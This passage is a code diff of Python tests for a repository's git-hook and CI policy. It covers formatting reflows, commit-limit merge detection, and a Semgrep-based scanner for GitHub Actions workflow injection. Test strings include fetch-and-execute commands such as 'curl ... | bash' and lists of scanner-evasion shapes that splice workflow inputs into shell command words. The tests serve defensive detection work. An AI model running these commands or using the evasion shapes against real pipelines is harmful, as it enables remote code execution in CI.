+        "p.write_text(old + sys.argv[1] + '\\n')\n",
+    )
     jobs = [
         {"name": "mypy", "run": f'"{PYTHON_POSIX}" marker.py mypy', "glob": "**/*.py"},
         {
@@ -1253,10 +1265,13 @@ def test_piped_pre_push_stdin_group_broadcasts_to_each_job(tmp_path: Path) -> No
     repo = tmp_path / "repo"
     _init_repo(repo)
     marker = repo / "marker.py"
-    _write_lf(marker, "from pathlib import Path\nimport sys\n"
+    _write_lf(
+        marker,
+        "from pathlib import Path\nimport sys\n"
         "p = Path('stdin.log')\n"
         "old = p.read_text() if p.exists() else ''\n"
-        "p.write_text(old + sys.argv[1] + ':' + sys.stdin.read())\n")
+        "p.write_text(old + sys.argv[1] + ':' + sys.stdin.read())\n",
+    )
     jobs = [
         {
             "name": name,
@@ -1295,8 +1310,11 @@ def test_native_push_files_cover_unpushed_branch_files(tmp_path: Path) -> None:
     _commit_file(repo, "one.py", "one = 1\n")
     head = _commit_file(repo, "two.yml", "two: true\n")
     marker = repo / "marker.py"
-    _write_lf(marker, "from pathlib import Path\nimport sys\n"
-        "Path('push-files.log').write_text('\\n'.join(sys.argv[1:]))\n")
+    _write_lf(
+        marker,
+        "from pathlib import Path\nimport sys\n"
+        "Path('push-files.log').write_text('\\n'.join(sys.argv[1:]))\n",
+    )
     config = {
         "glob_matcher": "doublestar",
         "pre-push": {
@@ -1457,9 +1475,12 @@ def test_stage_fixed_restages_only_the_formatted_input(tmp_path: Path) -> None:
     repo = tmp_path / "repo"
     _init_repo(repo)
     fixer = repo / "fixer.py"
-    _write_lf(fixer, "from pathlib import Path\nimport sys\n"
+    _write_lf(
+        fixer,
+        "from pathlib import Path\nimport sys\n"
         "Path(sys.argv[1]).write_text('fixed\\n', encoding='utf-8')\n"
-        "Path('generated.txt').write_text('generated\\n', encoding='utf-8')\n")
+        "Path('generated.txt').write_text('generated\\n', encoding='utf-8')\n",
+    )
     config = {
         "pre-commit": {
             "jobs": [
@@ -2212,13 +2233,16 @@ def test_lefthook_filters_use_active_git_index(tmp_path: Path) -> None:
     repo = tmp_path / "repo"
     _init_repo(repo)
     recorder = repo / "record_staged.py"
-    _write_lf(recorder, "import os\n"
+    _write_lf(
+        recorder,
+        "import os\n"
         "import sys\n"
         "from pathlib import Path\n"
         "Path('observed.txt').write_text(\n"
         "    os.environ.get('GIT_INDEX_FILE', '') + '\\n' + '\\n'.join(sys.argv[1:]),\n"
         "    encoding='utf-8',\n"
-        ")\n")
+        ")\n",
+    )
     config = {
         "pre-commit": {
             "jobs": [
@@ -2911,14 +2935,17 @@ def test_semgrep_real_cli_scans_ignored_file_over_default_size_limit(
     _write_lf(target, "value = 1\n" + "# padding\n" * 110_000)
     _write_lf(tmp_path / ".semgrepignore", f"{target.name}\n")
     config = tmp_path / "semgrep.yml"
-    _write_lf(config, """
+    _write_lf(
+        config,
+        """
 rules:
   - id: impossible-equality
     languages: [python]
     message: impossible
     severity: ERROR
     pattern: $X == $X
-""".lstrip())
+""".lstrip(),
+    )
     command = policy._semgrep_command(str(config), [str(target)])
     assert SEMGREP is not None
     command[0] = SEMGREP
@@ -2944,7 +2971,9 @@ def test_semgrep_real_cli_blocks_bash_curl_rules_with_powershell_step(
     tmp_path: Path,
 ) -> None:
     target = tmp_path / "mixed-shell-action.yml"
-    _write_lf(target, """
+    _write_lf(
+        target,
+        """
 name: mixed shell
 runs:
   using: composite
@@ -2959,7 +2988,8 @@ runs:
         DATA=$(curl -fsSL https://example.com/install.sh)
         eval "$DATA"
         curl -fsSL https://example.com/install.sh | bash
-""".lstrip())
+""".lstrip(),
+    )
 
     result = policy._run_semgrep_tree(tmp_path, [target.name], tmp_path)
 
@@ -3072,13 +3102,16 @@ def test_semgrep_allows_known_powershell_parser_mismatch(
 
 def test_semgrep_allows_partial_parsing_at_powershell_step(tmp_path: Path) -> None:
     target = tmp_path / "action.yml"
-    _write_lf(target, "runs:\n"
+    _write_lf(
+        target,
+        "runs:\n"
         "  steps:\n"
         "    - shell: pwsh\n"
         "      run: |\n"
         "        Write-Host 'safe'\n"
         "    - shell: bash\n"
-        "      run: echo safe\n")
+        "      run: echo safe\n",
+    )
     payload = {
         "errors": [_powershell_partial_parsing_error(target, line=4)],
         "paths": {"scanned": [str(target)]},
@@ -3133,14 +3166,17 @@ def test_semgrep_rejects_code_two_error_at_bash_step_in_mixed_shell_file(
 ) -> None:
     target = tmp_path / "action.yml"
     bash_script = 'DATA=$(curl -fsSL https://example.com/install.sh)\neval "$DATA"'
-    _write_lf(target, "runs:\n"
+    _write_lf(
+        target,
+        "runs:\n"
         "  steps:\n"
         "    - shell: pwsh\n"
         "      run: Write-Host 'safe'\n"
         "    - shell: bash\n"
         "      run: |\n"
         "        DATA=$(curl -fsSL https://example.com/install.sh)\n"
-        '        eval "$DATA"\n')
+        '        eval "$DATA"\n',
+    )
     payload = {
         "errors": [
             _powershell_semgrep_error(
@@ -3166,12 +3202,15 @@ def test_semgrep_rejects_code_two_error_with_ambiguous_shell_attribution(
 ) -> None:
     target = tmp_path / "action.yml"
     script = 'Write-Host "safe"'
-    _write_lf(target, "runs:\n"
+    _write_lf(
+        target,
+        "runs:\n"
         "  steps:\n"
         "    - shell: pwsh\n"
         f"      run: {script}\n"
         "    - shell: bash\n"
-        f"      run: {script}\n")
+        f"      run: {script}\n",
+    )
     payload = {
         "errors": [
             _powershell_semgrep_error(
@@ -3265,12 +3304,15 @@ def test_semgrep_accepts_code_two_error_for_aliased_powershell_step(
     tmp_path: Path,
 ) -> None:
     target = tmp_path / "action.yml"
-    _write_lf(target, "shared: &shared\n"
+    _write_lf(
+        target,
+        "shared: &shared\n"
         "  shell: pwsh\n"
         '  run: Write-Host "safe"\n'
         "runs:\n"
         "  steps:\n"
-        "    - *shared\n")
+        "    - *shared\n",
+    )
     payload = {
         "errors": [
             _powershell_semgrep_error(
@@ -3294,12 +3336,15 @@ def test_semgrep_rejects_nontruncated_code_two_snippet_prefix(
     tmp_path: Path,
 ) -> None:
     target = tmp_path / "action.yml"
-    _write_lf(target, "runs:\n"
+    _write_lf(
+        target,
+        "runs:\n"
         "  steps:\n"
         "    - shell: pwsh\n"
         "      run: |\n"
         "        Write-Host 'first'\n"
-        "        Write-Host 'second'\n")
+        "        Write-Host 'second'\n",
+    )
     payload = {
         "errors": [
             _powershell_semgrep_error(
@@ -3325,10 +3370,13 @@ def test_semgrep_accepts_long_truncated_code_two_powershell_snippet(
 ) -> None:
     target = tmp_path / "action.yml"
     lines = [f"Write-Host 'verification line {index}'" for index in range(5)]
-    _write_lf(target, "runs:\n"
+    _write_lf(
+        target,
+        "runs:\n"
         "  steps:\n"
         "    - shell: pwsh\n"
-        "      run: |\n" + "".join(f"        {line}\n" for line in lines))
+        "      run: |\n" + "".join(f"        {line}\n" for line in lines),
+    )
     snippet = "\n".join([*lines[:-1], lines[-1][:15]])
     payload = {
         "errors": [
@@ -3370,12 +3418,15 @@ def test_semgrep_rejects_unrecognized_partial_parsing_error(
     rule_id: str,
 ) -> None:
     target = tmp_path / "action.yml"
-    _write_lf(target, "runs:\n"
+    _write_lf(
+        target,
+        "runs:\n"
         "  steps:\n"
         "    - shell: pwsh\n"
         "      run: Write-Host 'safe'\n"
         "    - shell: bash\n"
-        "      run: echo safe\n")
+        "      run: echo safe\n",
+    )
     payload = {
         "errors": [
             _powershell_partial_parsing_error(
@@ -5204,13 +5255,16 @@ def test_commit_limit_relaxes_for_merge_from_main(
             return _completed(0, "30\n")
         if args[:2] == ["rev-list", "--merges"]:
             return _completed(0, "merge-sha\n")
-        if args[:2] == ["rev-list", "--first-parent"]:
-            return _completed(0, "main-parent\nolder-main\n")
         if args[0] == "show" and "--format=%P" in args:
             return _completed(0, "first-parent main-parent\n")
         return _completed(0)
 
     monkeypatch.setattr(policy, "_run_git", fake_git)
+    # main_first_parent_shas is imported into git_hook_policy's namespace; patch
+    # there so _contains_main_merge sees the correct trunk without a real git repo.
+    monkeypatch.setattr(
+        policy, "main_first_parent_shas", lambda _root: frozenset(["main-parent", "older-main"])
+    )
 
     assert policy._check_commit_limit(update, tmp_path) == 0
 
@@ -5231,13 +5285,16 @@ def test_commit_limit_holds_when_the_merged_parent_is_off_main_trunk(
             return _completed(0, "30\n")
         if args[:2] == ["rev-list", "--merges"]:
             return _completed(0, "merge-sha\n")
-        if args[:2] == ["rev-list", "--first-parent"]:
-            return _completed(0, "some-other-main-commit\n")
         if args[0] == "show" and "--format=%P" in args:
             return _completed(0, "first-parent landed-parent\n")
         return _completed(0)
 
     monkeypatch.setattr(policy, "_run_git", fake_git)
+    # Trunk contains a different commit; "landed-parent" is not on first-parent
+    # history, so the wider limit must be refused.
+    monkeypatch.setattr(
+        policy, "main_first_parent_shas", lambda _root: frozenset(["some-other-main-commit"])
+    )
     monkeypatch.setattr(
         policy,
         "_run_command",
@@ -5460,7 +5517,7 @@ def test_a_merge_is_not_a_merge_of_main_when_there_is_no_origin_main(
     _git(repo, "update-ref", "-d", "refs/remotes/origin/main")
     merge = _merge_into_local(repo, "main")
 
-    assert policy._main_trunk_commits(repo) == frozenset()
+    assert policy.main_first_parent_shas(repo) == frozenset()
     assert policy._merge_has_main_parent(merge, repo) is False
 
 
@@ -5475,21 +5532,25 @@ def test_the_main_trunk_is_read_once_for_one_push(
     keeps the cost flat in the number of merges pushed.
     """
     update = _push_update()
-    trunk_reads: list[Sequence[str]] = []
+    trunk_reads: list[None] = []
+
+    def fake_first_parent_shas(_root: Path) -> frozenset[str]:
+        trunk_reads.append(None)
+        return frozenset(["a-main-commit"])
 
     def fake_git(_root: Path, args: Sequence[str]) -> subprocess.CompletedProcess[str]:
         if args[:2] == ["rev-list", "--count"]:
             return _completed(0, "5\n")
         if args[:2] == ["rev-list", "--merges"]:
             return _completed(0, "".join(f"merge-{index}\n" for index in range(25)))
-        if args[:2] == ["rev-list", "--first-parent"]:
-            trunk_reads.append(args)
-            return _completed(0, "a-main-commit\n")
         if args[0] == "show" and "--format=%P" in args:
             return _completed(0, "first-parent a-landed-branch\n")
         return _completed(0)
 
     monkeypatch.setattr(policy, "_run_git", fake_git)
+    # main_first_parent_shas is imported into git_hook_policy's namespace; patch
+    # it there so _contains_main_merge picks up the mock.
+    monkeypatch.setattr(policy, "main_first_parent_shas", fake_first_parent_shas)
 
     assert policy._contains_main_merge(update, tmp_path) is False
     assert len(trunk_reads) == 1
@@ -7194,7 +7255,7 @@ def test_shells_naming_only_their_own_interpreter_are_non_bash(shell: str) -> No
     "shell",
     [
         "python3 -c \"import os,sys; os.system('bash ' + sys.argv[1])\" {0}",
-        "python3 -c 'import subprocess; subprocess.run([\"sh\", \"x\"])'",
+        'python3 -c \'import subprocess; subprocess.run(["sh", "x"])\'',
         "node -e \"require('child_process').execSync('bash x')\"",
         "perl -e 'exec q{zsh}'",
     ],
@@ -7212,7 +7273,7 @@ def test_shells_naming_a_foreign_interpreter_are_not_treated_as_non_bash(shell: 
         "node /usr/local/lib/run {0}",
         "pwsh -File C:\\tools\\run.ps1",
         "pwsh -File '~/x.ps1'",
-        "cmd /C \"call build.bat\"",
+        'cmd /C "call build.bat"',
     ],
 )
 def test_shells_delegating_to_a_script_file_are_not_treated_as_non_bash(shell: str) -> None:
@@ -7365,6 +7426,8 @@ def test_partial_parsing_spans_use_character_indexes_after_multibyte_content(
     assert spans == [(2, 2, len("# ✓✓✓\n"), len(raw.decode("utf-8")))]
     # The byte offset would have overshot by three, proving the conversion ran.
     assert spans[0][2] != prefix_bytes
+
+
 @pytest.mark.parametrize("shell", ["powershell", "pwsh -NoProfile", "python3"])
 def test_windows_shell_flags_stay_non_bash(shell: str) -> None:
     assert policy._is_non_bash_shell(shell) is True
@@ -7696,8 +7759,7 @@ def test_anchor_guard_leaves_ordinary_lines_matching(expected: str, actual: str)
     dropped every step containing a blank line.
     """
     assert (
-        policy._semgrep_line_matches_pattern(expected, actual, allow_expected_suffix=False)
-        is True
+        policy._semgrep_line_matches_pattern(expected, actual, allow_expected_suffix=False) is True
     )
 
 
@@ -7784,12 +7846,12 @@ _ARGUMENT_POSITION_SHAPES = (
     pytest.param('echo "${{ github.event.number }}"', id="quoted-argument"),
     pytest.param("gh pr view ${{ github.event.number }} --json title", id="bare-argument"),
     pytest.param('if [ "${{ inputs.mode }}" = "x" ]; then echo hi; fi', id="test-condition"),
-    pytest.param('curl http://x | sh # ${{ inputs.mode }}', id="trailing-comment"),
+    pytest.param("curl http://x | sh # ${{ inputs.mode }}", id="trailing-comment"),
     pytest.param('printf "%s" "${{ inputs.mode }}" > out.txt', id="redirect-argument"),
     pytest.param("MODE=${{ inputs.mode }} ./run.sh", id="assignment-value"),
     pytest.param("${{ inputs.cmd }} --flag", id="lone-expression"),
     pytest.param('echo "a ${{ inputs.mode }} b" | tee log', id="inside-string-piped"),
-    pytest.param('cat <<EOF\n${{ inputs.mode }}\nEOF', id="heredoc-body"),
+    pytest.param("cat <<EOF\n${{ inputs.mode }}\nEOF", id="heredoc-body"),
     pytest.param("./run.sh --mode=${{ inputs.mode }}", id="flag-value"),
 )
 
@@ -7820,7 +7882,7 @@ def test_shell_sink_promotion_stays_inside_its_own_pipeline() -> None:
 # scan. Sixty-five shapes were probed; these are the twenty-three that defeated
 # the first tokenizer. Refs #3673.
 _TOKENIZER_EVASIONS = (
-    pytest.param("bash <<< \"c${{ inputs.x }}url http://y | sh\"", id="here-string"),
+    pytest.param('bash <<< "c${{ inputs.x }}url http://y | sh"', id="here-string"),
     pytest.param("coproc c${{ inputs.x }}url http://y", id="coproc"),
     pytest.param("builtin c${{ inputs.x }}url http://y", id="builtin-prefix"),
     pytest.param("sudo c${{ inputs.x }}url http://y", id="sudo-prefix"),
@@ -7836,15 +7898,15 @@ _TOKENIZER_EVASIONS = (
         id="case-resume",
     ),
     pytest.param("echo hi > >(c${{ inputs.x }}url http://y)", id="process-substitution-out"),
-    pytest.param("source /dev/stdin <<< \"c${{ inputs.x }}url http://y\"", id="source-sink"),
-    pytest.param(". /dev/stdin <<< \"c${{ inputs.x }}url http://y\"", id="dot-source-sink"),
+    pytest.param('source /dev/stdin <<< "c${{ inputs.x }}url http://y"', id="source-sink"),
+    pytest.param('. /dev/stdin <<< "c${{ inputs.x }}url http://y"', id="dot-source-sink"),
     pytest.param("echo 'c${{ inputs.x }}url' | python3 -c 'pass'", id="python-inline-sink"),
     pytest.param("echo 'c${{ inputs.x }}url' | perl -e 'system(<>)'", id="perl-inline-sink"),
     pytest.param("echo 'c${{ inputs.x }}url' | node -e 'x'", id="node-inline-sink"),
     pytest.param("echo 'c${{ inputs.x }}url' | awk '{system($0)}'", id="awk-sink"),
-    pytest.param("ssh host \"c${{ inputs.x }}url http://y\"", id="ssh-sink"),
+    pytest.param('ssh host "c${{ inputs.x }}url http://y"', id="ssh-sink"),
     pytest.param("find . -exec c${{ inputs.x }}url http://y \\;", id="find-exec-sink"),
-    pytest.param("script -qc \"c${{ inputs.x }}url http://y\" /dev/null", id="script-sink"),
+    pytest.param('script -qc "c${{ inputs.x }}url http://y" /dev/null', id="script-sink"),
     pytest.param("echo 'c${{ inputs.x }}url' | ruby -e 'x'", id="ruby-inline-sink"),
     pytest.param(
         "echo 'c${{ inputs.x }}url http://y' | while read l; do eval \"$l\"; done",
@@ -7887,12 +7949,18 @@ def test_script_interpreters_are_sinks_only_with_an_inline_code_flag() -> None:
     ``python3 build.py --tag "v${{ inputs.version }}"``, a shape that appears in
     real workflows.
     """
-    assert policy._splices_expression_into_command_word(
-        'python3 build.py --tag "v${{ inputs.version }}"'
-    ) is False
-    assert policy._splices_expression_into_command_word(
-        "echo 'c${{ inputs.x }}url' | python3 -c 'pass'"
-    ) is True
+    assert (
+        policy._splices_expression_into_command_word(
+            'python3 build.py --tag "v${{ inputs.version }}"'
+        )
+        is False
+    )
+    assert (
+        policy._splices_expression_into_command_word(
+            "echo 'c${{ inputs.x }}url' | python3 -c 'pass'"
+        )
+        is True
+    )
 
 
 def test_tainted_variable_must_be_the_whole_command_word() -> None:
@@ -7902,10 +7970,13 @@ def test_tainted_variable_must_be_the_whole_command_word() -> None:
     ``COVERAGE="${{ ... }}"`` is later read inside ``$(echo "$COVERAGE >= 50" |
     bc -l)``.
     """
-    assert policy._splices_expression_into_command_word(
-        'COVERAGE="${{ steps.check.outputs.coverage }}"\n'
-        'if (( $(echo "$COVERAGE >= 50" | bc -l) )); then echo ok; fi'
-    ) is False
+    assert (
+        policy._splices_expression_into_command_word(
+            'COVERAGE="${{ steps.check.outputs.coverage }}"\n'
+            'if (( $(echo "$COVERAGE >= 50" | bc -l) )); then echo ok; fi'
+        )
+        is False
+    )
 
 
 _STAGED_SINK_EVASIONS = (
@@ -8138,30 +8209,35 @@ class TestACallTokenIsOnlyACallTokenUnderPowerShell:
             "python3 {0}",
         ],
     )
-    def test_every_shell_string_used_in_this_repository_still_classifies(
-        self, shell: str
-    ) -> None:
+    def test_every_shell_string_used_in_this_repository_still_classifies(self, shell: str) -> None:
         """Pin the live workflow spellings so the narrowing cannot break them."""
         assert policy._is_non_bash_shell(shell) is True
+
 
 def test_powershell_scan_reports_only_powershell_steps(tmp_path: Path) -> None:
     workflow = tmp_path / ".github" / "workflows" / "w.yml"
     workflow.parent.mkdir(parents=True)
-    _write_lf(workflow, "on: push\n"
+    _write_lf(
+        workflow,
+        "on: push\n"
         "jobs:\n"
         "  j:\n"
         "    steps:\n"
         "      - shell: bash\n"
         '        run: bash -c "curl http://x | sh"\n'
         "      - shell: pwsh\n"
-        '        run: Write-Host "bash is only mentioned"\n')
+        '        run: Write-Host "bash is only mentioned"\n',
+    )
     assert policy._scan_powershell_shell_outs(tmp_path, [".github/workflows/w.yml"]) == 0
-    _write_lf(workflow, "on: push\n"
+    _write_lf(
+        workflow,
+        "on: push\n"
         "jobs:\n"
         "  j:\n"
         "    steps:\n"
         "      - shell: pwsh\n"
-        '        run: bash -c "curl http://x | sh"\n')
+        '        run: bash -c "curl http://x | sh"\n',
+    )
     assert policy._scan_powershell_shell_outs(tmp_path, [".github/workflows/w.yml"]) == 1
 
 
@@ -8200,10 +8276,10 @@ _ROUND_FIVE_EVASIONS = (
     ("alias-cmdsub-rhs", 'SH=$(echo bash); $SH -c "c{expression}url http://x"'),
     ("group-pipe-both", "(echo 'c{expression}url http://x') |& sh"),
     ("staged-tee", "echo 'c{expression}url http://x' | tee /tmp/f; sh /tmp/f"),
-    ("staged-quoted-path", "echo 'c{expression}url http://x' > \"/tmp/f\"; sh \"/tmp/f\""),
+    ("staged-quoted-path", 'echo \'c{expression}url http://x\' > "/tmp/f"; sh "/tmp/f"'),
     ("staged-chmod-exec", "echo 'c{expression}url' > /tmp/f; chmod +x /tmp/f; /tmp/f"),
     ("sink-trap", 'trap "c{expression}url http://x" EXIT'),
-    ("sink-parallel", "echo 1 | parallel \"c{expression}url http://x\""),
+    ("sink-parallel", 'echo 1 | parallel "c{expression}url http://x"'),
     ("sink-make", 'make -f /dev/stdin <<<"a:\n\tc{expression}url http://x"'),
     ("set-positional", 'set -- "c{expression}url http://x"; bash -c "$1"'),
 )
@@ -8278,6 +8354,8 @@ def test_sink_alias_resolution_terminates_on_a_cycle() -> None:
 def test_variable_word_recognises_only_a_bare_expansion(word: str, expected: str | None) -> None:
     """A word that merely contains a variable is not a reference to one."""
     assert policy._shell_variable_name(word) == expected
+
+
 # Issue #3671: nothing stopped a git conflict marker reaching a commit. The
 # detector keys only on the labelled forms git writes and skips fenced code
 # blocks so documentation can quote a conflict.
@@ -8319,9 +8397,7 @@ def test_conflict_marker_detection(body: str, flagged: bool) -> None:
 
 
 def test_conflict_marker_violation_names_the_line_number() -> None:
-    violations = policy._conflict_marker_violations(
-        "doc.md", b"one\ntwo\n<<<<<<< HEAD\n"
-    )
+    violations = policy._conflict_marker_violations("doc.md", b"one\ntwo\n<<<<<<< HEAD\n")
     assert violations == ["doc.md:3: <<<<<<< HEAD"]
 
 
@@ -8519,11 +8595,7 @@ def test_the_commit_ceilings_come_from_the_shared_module() -> None:
     from scripts.validation import pr_commit_count
 
     assert policy.BLOCK_THRESHOLD == pr_commit_count.BLOCK_THRESHOLD == 20
-    assert (
-        policy.MAIN_MERGE_BLOCK_THRESHOLD
-        == pr_commit_count.MAIN_MERGE_BLOCK_THRESHOLD
-        == 40
-    )
+    assert policy.MAIN_MERGE_BLOCK_THRESHOLD == pr_commit_count.MAIN_MERGE_BLOCK_THRESHOLD == 40
 
 
 def test_taste_findings_stay_advisory(
@@ -8579,6 +8651,8 @@ def test_a_clean_taste_lint_says_nothing(
     )
     assert policy.run_taste_advisory(["source.py"], tmp_path) == 0
     assert "advisory" not in capsys.readouterr().err
+
+
 # ---------------------------------------------------------------------------
 # Issue #3770: the conflict-marker gate needs a backstop that survives every
 # route which skips local hooks
@@ -8696,9 +8770,7 @@ def test_the_tracked_scan_skips_a_binary_whose_nul_is_in_the_head(
     _init_repo(repo)
     _commit_file(repo, "doc.md", "clean\n")
     tail = b"<<<<<<< HEAD\nx\n>>>>>>> main\n"
-    (repo / "big.bin").write_bytes(
-        b"\x00" + b"\xff" * (policy._BINARY_SNIFF_BYTES * 4) + tail
-    )
+    (repo / "big.bin").write_bytes(b"\x00" + b"\xff" * (policy._BINARY_SNIFF_BYTES * 4) + tail)
     _git(repo, "add", "big.bin")
     _git(repo, "commit", "-m", "add big blob")
 
@@ -8719,9 +8791,7 @@ def test_the_tracked_scan_reads_only_the_head_of_a_binary(
     repo = tmp_path / "repo"
     _init_repo(repo)
     _commit_file(repo, "doc.md", "clean\n")
-    (repo / "big.bin").write_bytes(
-        b"\x00" + b"\xff" * (policy._BINARY_SNIFF_BYTES * 16)
-    )
+    (repo / "big.bin").write_bytes(b"\x00" + b"\xff" * (policy._BINARY_SNIFF_BYTES * 16))
     _git(repo, "add", "big.bin")
     _git(repo, "commit", "-m", "add big blob")
 

--- a/tests/test_lefthook_integration.py
+++ b/tests/test_lefthook_integration.py
@@ -5262,8 +5262,11 @@ def test_commit_limit_relaxes_for_merge_from_main(
     monkeypatch.setattr(policy, "_run_git", fake_git)
     # main_first_parent_shas is imported into git_hook_policy's namespace; patch
     # there so _contains_main_merge sees the correct trunk without a real git repo.
+    # The double takes run_git because the hook passes its own hardened runner.
     monkeypatch.setattr(
-        policy, "main_first_parent_shas", lambda _root: frozenset(["main-parent", "older-main"])
+        policy,
+        "main_first_parent_shas",
+        lambda _root, run_git=None: frozenset(["main-parent", "older-main"]),
     )
 
     assert policy._check_commit_limit(update, tmp_path) == 0
@@ -5293,7 +5296,9 @@ def test_commit_limit_holds_when_the_merged_parent_is_off_main_trunk(
     # Trunk contains a different commit; "landed-parent" is not on first-parent
     # history, so the wider limit must be refused.
     monkeypatch.setattr(
-        policy, "main_first_parent_shas", lambda _root: frozenset(["some-other-main-commit"])
+        policy,
+        "main_first_parent_shas",
+        lambda _root, run_git=None: frozenset(["some-other-main-commit"]),
     )
     monkeypatch.setattr(
         policy,
@@ -5534,7 +5539,7 @@ def test_the_main_trunk_is_read_once_for_one_push(
     update = _push_update()
     trunk_reads: list[None] = []
 
-    def fake_first_parent_shas(_root: Path) -> frozenset[str]:
+    def fake_first_parent_shas(_root: Path, run_git: object = None) -> frozenset[str]:
         trunk_reads.append(None)
         return frozenset(["a-main-commit"])
 

--- a/tests/validation/test_commit_limit_parity.py
+++ b/tests/validation/test_commit_limit_parity.py
@@ -1,0 +1,195 @@
+"""Bidirectional parity tests for the commit-limit merge-detection predicate.
+
+Issue #3997: CI and the pre-push hook used different predicates to decide
+whether a branch qualifies for the 40-commit relief. The fix unifies them via
+main_first_parent_shas in pr_commit_count.py.
+
+Both gates must AGREE on every history:
+- A branch that merges origin/main's trunk: BOTH grant the 40-commit relief.
+- A branch that merges only a side branch (not on origin/main's trunk): BOTH
+  deny the relief, keeping the 20-commit limit.
+
+The tests here are the required bidirectional controls from the campaign
+discipline: a history that should be relieved is tested through both paths,
+and a history that should not be relieved is tested through both paths.
+"""
+
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+from typing import Any
+
+from scripts.validation import git_hook_policy as policy
+from scripts.validation import pr_commit_count as commit_count
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+
+def _git(repo: Path, *args: str) -> subprocess.CompletedProcess[str]:
+    return subprocess.run(
+        ["git", *args],
+        cwd=repo,
+        text=True,
+        encoding="utf-8",
+        errors="replace",
+        capture_output=True,
+        check=True,
+    )
+
+
+def _init_repo(repo: Path) -> None:
+    repo.mkdir(parents=True, exist_ok=True)
+    _git(repo, "init", "-q", "-b", "main")
+    _git(repo, "config", "user.name", "Test User")
+    _git(repo, "config", "user.email", "user@example.com")
+
+
+def _commit(repo: Path, name: str) -> str:
+    f = repo / f"{name}.md"
+    f.write_text(f"{name}\n", encoding="utf-8")
+    _git(repo, "add", "--", str(f.name))
+    _git(repo, "commit", "-qm", f"test: {name}")
+    return _git(repo, "rev-parse", "HEAD").stdout.strip()
+
+
+def _push_update_for_feature(repo: Path, base: str, head: str) -> policy.PushUpdate:
+    src = policy.PushRef("refs/heads/feature", head, "refs/heads/feature", base)
+    return policy.PushUpdate(src, base, head, f"{base}..{head}", "feature")
+
+
+def _api_commits(repo: Path, head: str) -> list[Any]:
+    """Simulate the GitHub API commit list for a PR.
+
+    Uses origin/main..head to match what the real GitHub API returns:
+    commits reachable from head but NOT from the base branch (origin/main).
+    Each entry has the shape: {"sha": ..., "parents": [...]}.
+    """
+    result = _git(repo, "rev-list", "--topo-order", f"origin/main..{head}")
+    shas = [s for s in result.stdout.splitlines() if s]
+    commits = []
+    for sha in shas:
+        parents_raw = _git(repo, "log", "-1", "--format=%P", sha).stdout.strip()
+        parents = [{"sha": p} for p in parents_raw.split() if p]
+        commits.append({"sha": sha, "parents": parents})
+    return commits
+
+
+# ---------------------------------------------------------------------------
+# Repo builders
+# ---------------------------------------------------------------------------
+
+
+def _repo_branch_merges_main(tmp_path: Path, name: str) -> tuple[Path, str, str]:
+    """A feature branch that merges origin/main directly.
+
+    History:
+        main: base -> m1  [origin/main]
+        feature: base -> f1 -> f2 -> merge(m1)
+
+    m1 is on main's first-parent history. Both gates must grant relief.
+    """
+    repo = tmp_path / name
+    _init_repo(repo)
+    _commit(repo, "base")
+    _git(repo, "branch", "feature")
+    _commit(repo, "m1")
+    main_tip = _git(repo, "rev-parse", "HEAD").stdout.strip()
+    _git(repo, "update-ref", "refs/remotes/origin/main", main_tip)
+    _git(repo, "checkout", "-q", "feature")
+    base = _git(repo, "rev-parse", "HEAD").stdout.strip()
+    _commit(repo, "f1")
+    _commit(repo, "f2")
+    _git(repo, "merge", "-q", "--no-ff", "-m", "merge main", "main")
+    head = _git(repo, "rev-parse", "HEAD").stdout.strip()
+    return repo, base, head
+
+
+def _repo_branch_merges_landed_side(tmp_path: Path, name: str) -> tuple[Path, str, str]:
+    """A feature branch that merges a side branch already landed on main.
+
+    This is the divergence case from issue #3997.
+
+    History:
+        side: base -> s1
+        main: base -> before -> merge_landing(s1) -> after  [origin/main]
+        feature: base -> f1 -> f2 -> merge(s1)
+
+    s1 is reachable from origin/main (via the non-first parent of merge_landing)
+    but is NOT on origin/main's first-parent history.
+
+    Pre-fix: CI granted relief (s1 is external to the PR commit list).
+    Post-fix: CI denies relief (s1 not on first-parent trunk), matching the hook.
+    Both gates must deny relief.
+    """
+    repo = tmp_path / name
+    _init_repo(repo)
+    base_sha = _commit(repo, "base")
+    # Create side branch and add a commit to it.
+    _git(repo, "branch", "side")
+    _git(repo, "checkout", "-q", "side")
+    _commit(repo, "s1")
+    # Land the side branch on main via a merge commit.
+    _git(repo, "checkout", "-q", "main")
+    _commit(repo, "before")
+    _git(repo, "merge", "-q", "--no-ff", "-m", "land side on main", "side")
+    _commit(repo, "after")
+    main_tip = _git(repo, "rev-parse", "HEAD").stdout.strip()
+    _git(repo, "update-ref", "refs/remotes/origin/main", main_tip)
+    # Create feature branch from base (before side was landed) and merge side.
+    _git(repo, "checkout", "-q", "-b", "feature", base_sha)
+    _commit(repo, "f1")
+    _commit(repo, "f2")
+    _git(repo, "merge", "-q", "--no-ff", "-m", "merge already-landed side branch", "side")
+    head = _git(repo, "rev-parse", "HEAD").stdout.strip()
+    return repo, base_sha, head
+
+
+# ---------------------------------------------------------------------------
+# Parity tests: both gates must agree
+# ---------------------------------------------------------------------------
+
+
+def test_both_gates_grant_relief_when_branch_merges_main(tmp_path: Path) -> None:
+    """POSITIVE PARITY: a merge of origin/main grants relief in both gates.
+
+    The 40-commit ceiling exists for this case. Both the pre-push hook and CI
+    must grant relief, or the developer gets a contradictory governance signal.
+    """
+    repo, base, head = _repo_branch_merges_main(tmp_path, "both-grant")
+
+    update = _push_update_for_feature(repo, base, head)
+    api_commits = _api_commits(repo, head)
+
+    hook_grants = policy._contains_main_merge(update, repo)
+    ci_grants = commit_count.contains_main_merge(api_commits, repo)
+
+    assert hook_grants is True, "pre-push hook must grant relief for a merge of main"
+    assert ci_grants is True, "CI must grant relief for a merge of main"
+
+
+def test_both_gates_deny_relief_when_branch_merges_only_landed_side(tmp_path: Path) -> None:
+    """NEGATIVE PARITY (the divergence case from issue #3997).
+
+    A feature branch that merges a side branch already landed on main must NOT
+    receive the 40-commit relief from either gate. Before the fix, CI's
+    contains_base_merge granted relief (s1 was external to the PR commit list
+    because s1 is reachable from main), while the pre-push hook denied it (s1
+    is not on origin/main's first-parent history).
+    """
+    repo, base, head = _repo_branch_merges_landed_side(tmp_path, "both-deny")
+
+    update = _push_update_for_feature(repo, base, head)
+    api_commits = _api_commits(repo, head)
+
+    hook_grants = policy._contains_main_merge(update, repo)
+    ci_grants = commit_count.contains_main_merge(api_commits, repo)
+
+    assert hook_grants is False, (
